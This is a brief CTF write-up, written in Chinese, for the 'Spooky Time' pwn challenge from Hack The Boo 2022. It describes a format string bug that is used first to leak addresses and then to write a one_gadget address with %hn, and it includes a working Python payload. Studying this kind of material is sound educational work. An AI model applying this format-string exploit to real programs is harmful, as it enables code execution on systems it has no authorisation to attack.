# Hack The Boo 2022 /Spooky Time ###### tags: `CTF`,`PWN`,`writeup` 檔案連結:http://gofile.me/6lhQ2/QZMezYgd6   兩個輸入點，有format string的問題，一個拿來leak，一個拿來注入，沒有gadget加上又是format string，一定是選用one gadget  先用`%49$p%53$p`撈出rbp及libc 再用`%hn`注入libc偏移量及rbp以達成one_gadget條件，r10原本就是NULL不須注入 payload隨便寫很醜 ``` one_gadget = one_gadget % 0x100000000 a = (one_gadget//0x10000) b = (((one_gadget % 0x10000)-(one_gadget//0x10000)+0x10000) % 0x10000) c = ((rbp//0x100000000)-(one_gadget % 0x10000)+0x10000) % 0x10000 d = ((rbp//0x10000)-(rbp//0x100000000)+0x10000) % 0x10000 e = ((rbp % 0x10000)-((rbp % 0x100000000)//0x10000)+0x10000) % 0x10000 payload = b"%"+str(a).encode("UTF-8")+b"c%18$hn%"+str(b).encode("UTF-8")+b"c%19$hn%"+str(c).encode( "UTF-8")+b"c%20$hn%"+str(d).encode("UTF-8")+b"c%21$hn%"+str(e).encode("UTF-8")+b"c%22$hn" payload = payload.ljust(80, b"\x00")+p64(rbp+10) + \ p64(rbp+8)+p64(rbp+4)+p64(rbp+2)+p64(rbp) ```